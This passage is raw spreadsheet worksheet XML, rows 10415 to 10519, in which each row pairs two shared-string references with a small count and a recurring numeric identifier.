    </row>
    <row r="10415" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A10415" t="s">
        <v>16228</v>
      </c>
      <c r="B10415" t="s">
        <v>16211</v>
      </c>
      <c r="C10415">
        <v>0</v>
      </c>
      <c r="D10415">
        <v>1123</v>
      </c>
    </row>
    <row r="10416" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A10416" t="s">
        <v>16231</v>
      </c>
      <c r="B10416" t="s">
        <v>16212</v>
      </c>
      <c r="C10416">
        <v>0</v>
      </c>
      <c r="D10416">
        <v>1123</v>
      </c>
    </row>
    <row r="10417" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A10417" t="s">
        <v>16228</v>
      </c>
      <c r="B10417" t="s">
        <v>16213</v>
      </c>
      <c r="C10417">
        <v>0</v>
      </c>
      <c r="D10417">
        <v>1123</v>
      </c>
    </row>
    <row r="10418" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A10418" t="s">
        <v>16231</v>
      </c>
      <c r="B10418" t="s">
        <v>16214</v>
      </c>
      <c r="C10418">
        <v>0</v>
      </c>
      <c r="D10418">
        <v>1123</v>
      </c>
    </row>
    <row r="10419" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A10419" t="s">
        <v>16228</v>
      </c>
      <c r="B10419" t="s">
        <v>16215</v>
      </c>
      <c r="C10419">
        <v>100</v>
      </c>
      <c r="D10419">
        <v>1123</v>
      </c>
    </row>
    <row r="10420" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A10420" t="s">
        <v>16231</v>
      </c>
      <c r="B10420" t="s">
        <v>16216</v>
      </c>
      <c r="C10420">
        <v>52</v>
      </c>
      <c r="D10420">
        <v>1123</v>
      </c>
    </row>
    <row r="10421" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A10421" t="s">
        <v>16228</v>
      </c>
      <c r="B10421" t="s">
        <v>16217</v>
      </c>
      <c r="C10421">
        <v>0</v>
      </c>
      <c r="D10421">
        <v>1123</v>
      </c>
    </row>
    <row r="10422" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A10422" t="s">
        <v>16231</v>
      </c>
      <c r="B10422" t="s">
        <v>16218</v>
      </c>
      <c r="C10422">
        <v>0</v>
      </c>
      <c r="D10422">
        <v>1123</v>
      </c>
    </row>
    <row r="10423" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A10423" t="s">
        <v>16229</v>
      </c>
      <c r="B10423" t="s">
        <v>16219</v>
      </c>
      <c r="C10423">
        <v>0</v>
      </c>
      <c r="D10423">
        <v>1123</v>
      </c>
    </row>
    <row r="10424" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A10424" t="s">
        <v>16230</v>
      </c>
      <c r="B10424" t="s">
        <v>16220</v>
      </c>
      <c r="C10424">
        <v>0</v>
      </c>
      <c r="D10424">
        <v>1123</v>
      </c>
    </row>
    <row r="10425" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A10425" t="s">
        <v>16229</v>
      </c>
      <c r="B10425" t="s">
        <v>16221</v>
      </c>
      <c r="C10425">
        <v>0</v>
      </c>
      <c r="D10425">
        <v>1123</v>
      </c>
    </row>
    <row r="10426" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A10426" t="s">
        <v>16230</v>
      </c>
      <c r="B10426" t="s">
        <v>16222</v>
      </c>
      <c r="C10426">
        <v>0</v>
      </c>
      <c r="D10426">
        <v>1123</v>
      </c>
    </row>
    <row r="10427" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A10427" t="s">
        <v>16223</v>
      </c>
      <c r="B10427" t="s">
        <v>16223</v>
      </c>
      <c r="C10427">
        <v>21</v>
      </c>
      <c r="D10427">
        <v>1123</v>
      </c>
    </row>
    <row r="10428" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A10428" t="s">
        <v>16224</v>
      </c>
      <c r="B10428" t="s">
        <v>16224</v>
      </c>
      <c r="C10428">
        <v>1</v>
      </c>
      <c r="D10428">
        <v>1123</v>
      </c>
    </row>
    <row r="10429" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A10429" t="s">
        <v>16228</v>
      </c>
      <c r="B10429" t="s">
        <v>16211</v>
      </c>
      <c r="C10429">
        <v>0</v>
      </c>
      <c r="D10429">
        <v>4902</v>
      </c>
    </row>
    <row r="10430" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A10430" t="s">
        <v>16231</v>
      </c>
      <c r="B10430" t="s">
        <v>16212</v>
      </c>
      <c r="C10430">
        <v>0</v>
      </c>
      <c r="D10430">
        <v>4902</v>
      </c>
    </row>
    <row r="10431" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A10431" t="s">
        <v>16228</v>
      </c>
      <c r="B10431" t="s">
        <v>16213</v>
      </c>
      <c r="C10431">
        <v>0</v>
      </c>
      <c r="D10431">
        <v>4902</v>
      </c>
    </row>
    <row r="10432" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A10432" t="s">
        <v>16231</v>
      </c>
      <c r="B10432" t="s">
        <v>16214</v>
      </c>
      <c r="C10432">
        <v>0</v>
      </c>
      <c r="D10432">
        <v>4902</v>
      </c>
    </row>
    <row r="10433" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A10433" t="s">
        <v>16228</v>
      </c>
      <c r="B10433" t="s">
        <v>16215</v>
      </c>
      <c r="C10433">
        <v>0</v>
      </c>
      <c r="D10433">
        <v>4902</v>
      </c>
    </row>
    <row r="10434" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A10434" t="s">
        <v>16231</v>
      </c>
      <c r="B10434" t="s">
        <v>16216</v>
      </c>
      <c r="C10434">
        <v>1</v>
      </c>
      <c r="D10434">
        <v>4902</v>
      </c>
    </row>
    <row r="10435" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A10435" t="s">
        <v>16228</v>
      </c>
      <c r="B10435" t="s">
        <v>16217</v>
      </c>
      <c r="C10435">
        <v>0</v>
      </c>
      <c r="D10435">
        <v>4902</v>
      </c>
    </row>
    <row r="10436" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A10436" t="s">
        <v>16231</v>
      </c>
      <c r="B10436" t="s">
        <v>16218</v>
      </c>
      <c r="C10436">
        <v>3</v>
      </c>
      <c r="D10436">
        <v>4902</v>
      </c>
    </row>
    <row r="10437" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A10437" t="s">
        <v>16229</v>
      </c>
      <c r="B10437" t="s">
        <v>16219</v>
      </c>
      <c r="C10437">
        <v>0</v>
      </c>
      <c r="D10437">
        <v>4902</v>
      </c>
    </row>
    <row r="10438" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A10438" t="s">
        <v>16230</v>
      </c>
      <c r="B10438" t="s">
        <v>16220</v>
      </c>
      <c r="C10438">
        <v>1</v>
      </c>
      <c r="D10438">
        <v>4902</v>
      </c>
    </row>
    <row r="10439" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A10439" t="s">
        <v>16229</v>
      </c>
      <c r="B10439" t="s">
        <v>16221</v>
      </c>
      <c r="C10439">
        <v>0</v>
      </c>
      <c r="D10439">
        <v>4902</v>
      </c>
    </row>
    <row r="10440" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A10440" t="s">
        <v>16230</v>
      </c>
      <c r="B10440" t="s">
        <v>16222</v>
      </c>
      <c r="C10440">
        <v>1</v>
      </c>
      <c r="D10440">
        <v>4902</v>
      </c>
    </row>
    <row r="10441" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A10441" t="s">
        <v>16223</v>
      </c>
      <c r="B10441" t="s">
        <v>16223</v>
      </c>
      <c r="C10441">
        <v>5</v>
      </c>
      <c r="D10441">
        <v>4902</v>
      </c>
    </row>
    <row r="10442" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A10442" t="s">
        <v>16224</v>
      </c>
      <c r="B10442" t="s">
        <v>16224</v>
      </c>
      <c r="C10442">
        <v>1</v>
      </c>
      <c r="D10442">
        <v>4902</v>
      </c>
    </row>
    <row r="10443" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A10443" t="s">
        <v>16228</v>
      </c>
      <c r="B10443" t="s">
        <v>16211</v>
      </c>
      <c r="C10443">
        <v>1</v>
      </c>
      <c r="D10443">
        <v>837</v>
      </c>
    </row>
    <row r="10444" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A10444" t="s">
        <v>16231</v>
      </c>
      <c r="B10444" t="s">
        <v>16212</v>
      </c>
      <c r="C10444">
        <v>2</v>
      </c>
      <c r="D10444">
        <v>837</v>
      </c>
    </row>
    <row r="10445" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A10445" t="s">
        <v>16228</v>
      </c>
      <c r="B10445" t="s">
        <v>16213</v>
      </c>
      <c r="C10445">
        <v>5</v>
      </c>
      <c r="D10445">
        <v>837</v>
      </c>
    </row>
    <row r="10446" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A10446" t="s">
        <v>16231</v>
      </c>
      <c r="B10446" t="s">
        <v>16214</v>
      </c>
      <c r="C10446">
        <v>0</v>
      </c>
      <c r="D10446">
        <v>837</v>
      </c>
    </row>
    <row r="10447" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A10447" t="s">
        <v>16228</v>
      </c>
      <c r="B10447" t="s">
        <v>16215</v>
      </c>
      <c r="C10447">
        <v>1</v>
      </c>
      <c r="D10447">
        <v>837</v>
      </c>
    </row>
    <row r="10448" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A10448" t="s">
        <v>16231</v>
      </c>
      <c r="B10448" t="s">
        <v>16216</v>
      </c>
      <c r="C10448">
        <v>2</v>
      </c>
      <c r="D10448">
        <v>837</v>
      </c>
    </row>
    <row r="10449" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A10449" t="s">
        <v>16228</v>
      </c>
      <c r="B10449" t="s">
        <v>16217</v>
      </c>
      <c r="C10449">
        <v>5</v>
      </c>
      <c r="D10449">
        <v>837</v>
      </c>
    </row>
    <row r="10450" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A10450" t="s">
        <v>16231</v>
      </c>
      <c r="B10450" t="s">
        <v>16218</v>
      </c>
      <c r="C10450">
        <v>0</v>
      </c>
      <c r="D10450">
        <v>837</v>
      </c>
    </row>
    <row r="10451" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A10451" t="s">
        <v>16229</v>
      </c>
      <c r="B10451" t="s">
        <v>16219</v>
      </c>
      <c r="C10451">
        <v>0</v>
      </c>
      <c r="D10451">
        <v>837</v>
      </c>
    </row>
    <row r="10452" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A10452" t="s">
        <v>16230</v>
      </c>
      <c r="B10452" t="s">
        <v>16220</v>
      </c>
      <c r="C10452">
        <v>0</v>
      </c>
      <c r="D10452">
        <v>837</v>
      </c>
    </row>
    <row r="10453" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A10453" t="s">
        <v>16229</v>
      </c>
      <c r="B10453" t="s">
        <v>16221</v>
      </c>
      <c r="C10453">
        <v>5</v>
      </c>
      <c r="D10453">
        <v>837</v>
      </c>
    </row>
    <row r="10454" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A10454" t="s">
        <v>16230</v>
      </c>
      <c r="B10454" t="s">
        <v>16222</v>
      </c>
      <c r="C10454">
        <v>2</v>
      </c>
      <c r="D10454">
        <v>837</v>
      </c>
    </row>
    <row r="10455" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A10455" t="s">
        <v>16223</v>
      </c>
      <c r="B10455" t="s">
        <v>16223</v>
      </c>
      <c r="C10455">
        <v>1</v>
      </c>
      <c r="D10455">
        <v>837</v>
      </c>
    </row>
    <row r="10456" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A10456" t="s">
        <v>16224</v>
      </c>
      <c r="B10456" t="s">
        <v>16224</v>
      </c>
      <c r="C10456">
        <v>1</v>
      </c>
      <c r="D10456">
        <v>837</v>
      </c>
    </row>
    <row r="10457" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A10457" t="s">
        <v>16228</v>
      </c>
      <c r="B10457" t="s">
        <v>16211</v>
      </c>
      <c r="C10457">
        <v>0</v>
      </c>
      <c r="D10457">
        <v>1134</v>
      </c>
    </row>
    <row r="10458" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A10458" t="s">
        <v>16231</v>
      </c>
      <c r="B10458" t="s">
        <v>16212</v>
      </c>
      <c r="C10458">
        <v>0</v>
      </c>
      <c r="D10458">
        <v>1134</v>
      </c>
    </row>
    <row r="10459" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A10459" t="s">
        <v>16228</v>
      </c>
      <c r="B10459" t="s">
        <v>16213</v>
      </c>
      <c r="C10459">
        <v>0</v>
      </c>
      <c r="D10459">
        <v>1134</v>
      </c>
    </row>
    <row r="10460" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A10460" t="s">
        <v>16231</v>
      </c>
      <c r="B10460" t="s">
        <v>16214</v>
      </c>
      <c r="C10460">
        <v>0</v>
      </c>
      <c r="D10460">
        <v>1134</v>
      </c>
    </row>
    <row r="10461" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A10461" t="s">
        <v>16228</v>
      </c>
      <c r="B10461" t="s">
        <v>16215</v>
      </c>
      <c r="C10461">
        <v>2</v>
      </c>
      <c r="D10461">
        <v>1134</v>
      </c>
    </row>
    <row r="10462" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A10462" t="s">
        <v>16231</v>
      </c>
      <c r="B10462" t="s">
        <v>16216</v>
      </c>
      <c r="C10462">
        <v>4</v>
      </c>
      <c r="D10462">
        <v>1134</v>
      </c>
    </row>
    <row r="10463" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A10463" t="s">
        <v>16228</v>
      </c>
      <c r="B10463" t="s">
        <v>16217</v>
      </c>
      <c r="C10463">
        <v>2</v>
      </c>
      <c r="D10463">
        <v>1134</v>
      </c>
    </row>
    <row r="10464" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A10464" t="s">
        <v>16231</v>
      </c>
      <c r="B10464" t="s">
        <v>16218</v>
      </c>
      <c r="C10464">
        <v>0</v>
      </c>
      <c r="D10464">
        <v>1134</v>
      </c>
    </row>
    <row r="10465" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A10465" t="s">
        <v>16229</v>
      </c>
      <c r="B10465" t="s">
        <v>16219</v>
      </c>
      <c r="C10465">
        <v>0</v>
      </c>
      <c r="D10465">
        <v>1134</v>
      </c>
    </row>
    <row r="10466" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A10466" t="s">
        <v>16230</v>
      </c>
      <c r="B10466" t="s">
        <v>16220</v>
      </c>
      <c r="C10466">
        <v>0</v>
      </c>
      <c r="D10466">
        <v>1134</v>
      </c>
    </row>
    <row r="10467" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A10467" t="s">
        <v>16229</v>
      </c>
      <c r="B10467" t="s">
        <v>16221</v>
      </c>
      <c r="C10467">
        <v>8</v>
      </c>
      <c r="D10467">
        <v>1134</v>
      </c>
    </row>
    <row r="10468" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A10468" t="s">
        <v>16230</v>
      </c>
      <c r="B10468" t="s">
        <v>16222</v>
      </c>
      <c r="C10468">
        <v>12</v>
      </c>
      <c r="D10468">
        <v>1134</v>
      </c>
    </row>
    <row r="10469" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A10469" t="s">
        <v>16223</v>
      </c>
      <c r="B10469" t="s">
        <v>16223</v>
      </c>
      <c r="C10469">
        <v>30</v>
      </c>
      <c r="D10469">
        <v>1134</v>
      </c>
    </row>
    <row r="10470" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A10470" t="s">
        <v>16224</v>
      </c>
      <c r="B10470" t="s">
        <v>16224</v>
      </c>
      <c r="C10470">
        <v>1</v>
      </c>
      <c r="D10470">
        <v>1134</v>
      </c>
    </row>
    <row r="10471" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A10471" t="s">
        <v>16228</v>
      </c>
      <c r="B10471" t="s">
        <v>16211</v>
      </c>
      <c r="C10471">
        <v>0</v>
      </c>
      <c r="D10471">
        <v>907</v>
      </c>
    </row>
    <row r="10472" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A10472" t="s">
        <v>16231</v>
      </c>
      <c r="B10472" t="s">
        <v>16212</v>
      </c>
      <c r="C10472">
        <v>0</v>
      </c>
      <c r="D10472">
        <v>907</v>
      </c>
    </row>
    <row r="10473" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A10473" t="s">
        <v>16228</v>
      </c>
      <c r="B10473" t="s">
        <v>16213</v>
      </c>
      <c r="C10473">
        <v>0</v>
      </c>
      <c r="D10473">
        <v>907</v>
      </c>
    </row>
    <row r="10474" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A10474" t="s">
        <v>16231</v>
      </c>
      <c r="B10474" t="s">
        <v>16214</v>
      </c>
      <c r="C10474">
        <v>0</v>
      </c>
      <c r="D10474">
        <v>907</v>
      </c>
    </row>
    <row r="10475" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A10475" t="s">
        <v>16228</v>
      </c>
      <c r="B10475" t="s">
        <v>16215</v>
      </c>
      <c r="C10475">
        <v>1</v>
      </c>
      <c r="D10475">
        <v>907</v>
      </c>
    </row>
    <row r="10476" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A10476" t="s">
        <v>16231</v>
      </c>
      <c r="B10476" t="s">
        <v>16216</v>
      </c>
      <c r="C10476">
        <v>1</v>
      </c>
      <c r="D10476">
        <v>907</v>
      </c>
    </row>
    <row r="10477" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A10477" t="s">
        <v>16228</v>
      </c>
      <c r="B10477" t="s">
        <v>16217</v>
      </c>
      <c r="C10477">
        <v>4</v>
      </c>
      <c r="D10477">
        <v>907</v>
      </c>
    </row>
    <row r="10478" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A10478" t="s">
        <v>16231</v>
      </c>
      <c r="B10478" t="s">
        <v>16218</v>
      </c>
      <c r="C10478">
        <v>1</v>
      </c>
      <c r="D10478">
        <v>907</v>
      </c>
    </row>
    <row r="10479" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A10479" t="s">
        <v>16229</v>
      </c>
      <c r="B10479" t="s">
        <v>16219</v>
      </c>
      <c r="C10479">
        <v>0</v>
      </c>
      <c r="D10479">
        <v>907</v>
      </c>
    </row>
    <row r="10480" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A10480" t="s">
        <v>16230</v>
      </c>
      <c r="B10480" t="s">
        <v>16220</v>
      </c>
      <c r="C10480">
        <v>0</v>
      </c>
      <c r="D10480">
        <v>907</v>
      </c>
    </row>
    <row r="10481" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A10481" t="s">
        <v>16229</v>
      </c>
      <c r="B10481" t="s">
        <v>16221</v>
      </c>
      <c r="C10481">
        <v>9</v>
      </c>
      <c r="D10481">
        <v>907</v>
      </c>
    </row>
    <row r="10482" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A10482" t="s">
        <v>16230</v>
      </c>
      <c r="B10482" t="s">
        <v>16222</v>
      </c>
      <c r="C10482">
        <v>3</v>
      </c>
      <c r="D10482">
        <v>907</v>
      </c>
    </row>
    <row r="10483" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A10483" t="s">
        <v>16223</v>
      </c>
      <c r="B10483" t="s">
        <v>16223</v>
      </c>
      <c r="C10483">
        <v>26</v>
      </c>
      <c r="D10483">
        <v>907</v>
      </c>
    </row>
    <row r="10484" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A10484" t="s">
        <v>16224</v>
      </c>
      <c r="B10484" t="s">
        <v>16224</v>
      </c>
      <c r="C10484">
        <v>0</v>
      </c>
      <c r="D10484">
        <v>907</v>
      </c>
    </row>
    <row r="10485" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A10485" t="s">
        <v>16228</v>
      </c>
      <c r="B10485" t="s">
        <v>16211</v>
      </c>
      <c r="C10485">
        <v>0</v>
      </c>
      <c r="D10485">
        <v>1756</v>
      </c>
    </row>
    <row r="10486" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A10486" t="s">
        <v>16231</v>
      </c>
      <c r="B10486" t="s">
        <v>16212</v>
      </c>
      <c r="C10486">
        <v>0</v>
      </c>
      <c r="D10486">
        <v>1756</v>
      </c>
    </row>
    <row r="10487" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A10487" t="s">
        <v>16228</v>
      </c>
      <c r="B10487" t="s">
        <v>16213</v>
      </c>
      <c r="C10487">
        <v>0</v>
      </c>
      <c r="D10487">
        <v>1756</v>
      </c>
    </row>
    <row r="10488" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A10488" t="s">
        <v>16231</v>
      </c>
      <c r="B10488" t="s">
        <v>16214</v>
      </c>
      <c r="C10488">
        <v>0</v>
      </c>
      <c r="D10488">
        <v>1756</v>
      </c>
    </row>
    <row r="10489" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A10489" t="s">
        <v>16228</v>
      </c>
      <c r="B10489" t="s">
        <v>16215</v>
      </c>
      <c r="C10489">
        <v>2</v>
      </c>
      <c r="D10489">
        <v>1756</v>
      </c>
    </row>
    <row r="10490" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A10490" t="s">
        <v>16231</v>
      </c>
      <c r="B10490" t="s">
        <v>16216</v>
      </c>
      <c r="C10490">
        <v>2</v>
      </c>
      <c r="D10490">
        <v>1756</v>
      </c>
    </row>
    <row r="10491" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A10491" t="s">
        <v>16228</v>
      </c>
      <c r="B10491" t="s">
        <v>16217</v>
      </c>
      <c r="C10491">
        <v>5</v>
      </c>
      <c r="D10491">
        <v>1756</v>
      </c>
    </row>
    <row r="10492" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A10492" t="s">
        <v>16231</v>
      </c>
      <c r="B10492" t="s">
        <v>16218</v>
      </c>
      <c r="C10492">
        <v>1</v>
      </c>
      <c r="D10492">
        <v>1756</v>
      </c>
    </row>
    <row r="10493" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A10493" t="s">
        <v>16229</v>
      </c>
      <c r="B10493" t="s">
        <v>16219</v>
      </c>
      <c r="C10493">
        <v>0</v>
      </c>
      <c r="D10493">
        <v>1756</v>
      </c>
    </row>
    <row r="10494" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A10494" t="s">
        <v>16230</v>
      </c>
      <c r="B10494" t="s">
        <v>16220</v>
      </c>
      <c r="C10494">
        <v>0</v>
      </c>
      <c r="D10494">
        <v>1756</v>
      </c>
    </row>
    <row r="10495" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A10495" t="s">
        <v>16229</v>
      </c>
      <c r="B10495" t="s">
        <v>16221</v>
      </c>
      <c r="C10495">
        <v>5</v>
      </c>
      <c r="D10495">
        <v>1756</v>
      </c>
    </row>
    <row r="10496" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A10496" t="s">
        <v>16230</v>
      </c>
      <c r="B10496" t="s">
        <v>16222</v>
      </c>
      <c r="C10496">
        <v>15</v>
      </c>
      <c r="D10496">
        <v>1756</v>
      </c>
    </row>
    <row r="10497" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A10497" t="s">
        <v>16223</v>
      </c>
      <c r="B10497" t="s">
        <v>16223</v>
      </c>
      <c r="C10497">
        <v>26</v>
      </c>
      <c r="D10497">
        <v>1756</v>
      </c>
    </row>
    <row r="10498" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A10498" t="s">
        <v>16224</v>
      </c>
      <c r="B10498" t="s">
        <v>16224</v>
      </c>
      <c r="C10498">
        <v>0</v>
      </c>
      <c r="D10498">
        <v>1756</v>
      </c>
    </row>
    <row r="10499" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A10499" t="s">
        <v>16228</v>
      </c>
      <c r="B10499" t="s">
        <v>16211</v>
      </c>
      <c r="C10499">
        <v>0</v>
      </c>
      <c r="D10499">
        <v>4919</v>
      </c>
    </row>
    <row r="10500" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A10500" t="s">
        <v>16231</v>
      </c>
      <c r="B10500" t="s">
        <v>16212</v>
      </c>
      <c r="C10500">
        <v>0</v>
      </c>
      <c r="D10500">
        <v>4919</v>
      </c>
    </row>
    <row r="10501" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A10501" t="s">
        <v>16228</v>
      </c>
      <c r="B10501" t="s">
        <v>16213</v>
      </c>
      <c r="C10501">
        <v>0</v>
      </c>
      <c r="D10501">
        <v>4919</v>
      </c>
    </row>
    <row r="10502" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A10502" t="s">
        <v>16231</v>
      </c>
      <c r="B10502" t="s">
        <v>16214</v>
      </c>
      <c r="C10502">
        <v>0</v>
      </c>
      <c r="D10502">
        <v>4919</v>
      </c>
    </row>
    <row r="10503" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A10503" t="s">
        <v>16228</v>
      </c>
      <c r="B10503" t="s">
        <v>16215</v>
      </c>
      <c r="C10503">
        <v>0</v>
      </c>
      <c r="D10503">
        <v>4919</v>
      </c>
    </row>
    <row r="10504" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A10504" t="s">
        <v>16231</v>
      </c>
      <c r="B10504" t="s">
        <v>16216</v>
      </c>
      <c r="C10504">
        <v>1</v>
      </c>
      <c r="D10504">
        <v>4919</v>
      </c>
    </row>
    <row r="10505" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A10505" t="s">
        <v>16228</v>
      </c>
      <c r="B10505" t="s">
        <v>16217</v>
      </c>
      <c r="C10505">
        <v>1</v>
      </c>
      <c r="D10505">
        <v>4919</v>
      </c>
    </row>
    <row r="10506" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A10506" t="s">
        <v>16231</v>
      </c>
      <c r="B10506" t="s">
        <v>16218</v>
      </c>
      <c r="C10506">
        <v>0</v>
      </c>
      <c r="D10506">
        <v>4919</v>
      </c>
    </row>
    <row r="10507" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A10507" t="s">
        <v>16229</v>
      </c>
      <c r="B10507" t="s">
        <v>16219</v>
      </c>
      <c r="C10507">
        <v>0</v>
      </c>
      <c r="D10507">
        <v>4919</v>
      </c>
    </row>
    <row r="10508" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A10508" t="s">
        <v>16230</v>
      </c>
      <c r="B10508" t="s">
        <v>16220</v>
      </c>
      <c r="C10508">
        <v>0</v>
      </c>
      <c r="D10508">
        <v>4919</v>
      </c>
    </row>
    <row r="10509" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A10509" t="s">
        <v>16229</v>
      </c>
      <c r="B10509" t="s">
        <v>16221</v>
      </c>
      <c r="C10509">
        <v>0</v>
      </c>
      <c r="D10509">
        <v>4919</v>
      </c>
    </row>
    <row r="10510" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A10510" t="s">
        <v>16230</v>
      </c>
      <c r="B10510" t="s">
        <v>16222</v>
      </c>
      <c r="C10510">
        <v>0</v>
      </c>
      <c r="D10510">
        <v>4919</v>
      </c>
    </row>
    <row r="10511" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A10511" t="s">
        <v>16223</v>
      </c>
      <c r="B10511" t="s">
        <v>16223</v>
      </c>
      <c r="C10511">
        <v>0</v>
      </c>
      <c r="D10511">
        <v>4919</v>
      </c>
    </row>
    <row r="10512" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A10512" t="s">
        <v>16224</v>
      </c>
      <c r="B10512" t="s">
        <v>16224</v>
      </c>
      <c r="C10512">
        <v>0</v>
      </c>
      <c r="D10512">
        <v>4919</v>
      </c>
    </row>
    <row r="10513" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A10513" t="s">
        <v>16228</v>
      </c>
      <c r="B10513" t="s">
        <v>16215</v>
      </c>
      <c r="C10513">
        <v>6</v>
      </c>
      <c r="D10513">
        <v>4919</v>
      </c>
    </row>
    <row r="10514" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A10514" t="s">
        <v>16229</v>
      </c>
      <c r="B10514" t="s">
        <v>16221</v>
      </c>
      <c r="C10514">
        <v>15</v>
      </c>
      <c r="D10514">
        <v>4919</v>
      </c>
    </row>
    <row r="10515" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A10515" t="s">
        <v>16230</v>
      </c>
      <c r="B10515" t="s">
        <v>16222</v>
      </c>
      <c r="C10515">
        <v>15</v>
      </c>
      <c r="D10515">
        <v>4919</v>
      </c>
    </row>
    <row r="10516" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A10516" t="s">
        <v>16223</v>
      </c>
      <c r="B10516" t="s">
        <v>16223</v>
      </c>
      <c r="C10516">
        <v>6</v>
      </c>
      <c r="D10516">
        <v>4919</v>
      </c>
    </row>
    <row r="10517" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A10517" t="s">
        <v>16224</v>
      </c>
      <c r="B10517" t="s">
        <v>16224</v>
      </c>
      <c r="C10517">
        <v>3</v>
      </c>
      <c r="D10517">
        <v>4919</v>
      </c>
    </row>
    <row r="10518" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A10518" t="s">
        <v>16231</v>
      </c>
      <c r="B10518" t="s">
        <v>16216</v>
      </c>
      <c r="C10518">
        <v>2</v>
      </c>
      <c r="D10518">
        <v>4909</v>
      </c>
    </row>
    <row r="10519" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A10519" t="s">
        <v>16228</v>
      </c>
      <c r="B10519" t="s">
        <v>16217</v>
      </c>
      <c r="C10519">
        <v>4</v>
      </c>
      <c r="D10519">
        <v>4909</v>
      </c>
    </row>
